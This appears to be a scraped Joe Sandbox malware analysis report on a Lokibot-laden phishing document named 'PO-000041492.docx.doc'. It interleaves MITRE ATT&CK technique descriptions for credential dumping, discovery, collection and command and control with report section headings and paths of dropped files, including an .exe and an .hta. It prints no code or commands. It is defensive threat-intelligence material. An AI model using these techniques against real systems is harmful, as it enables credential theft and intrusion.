Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PO-000041492.docx.doc

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Lokibot

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Exploits

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Exploits

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD (copy)

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\caspol[1].exe

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seemybestoptionforentiretimegivenmebackwith______suchagreatthignswithentiretimewithmegood______seethebestthignsalwaysgivnebestthigns[1].doc

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\goodtoseeuthatgreatthingswithentirethingsgreatfor[1].hta

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\18F2865F.doc

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\521ACD4.emf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6776DACC.png

Windows Analysis Report
PO-000041492.docx.doc

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seemybestoptionforentiretimegivenmebackwithsuchagreatthignswithentiretimewithmegoodseethebestthignsalwaysgivnebestthigns[1].doc

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.
Tactics:	Collection
Data Sources:	Logon Session: Logon Session Creation, Process: Process Access, Process: Process Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre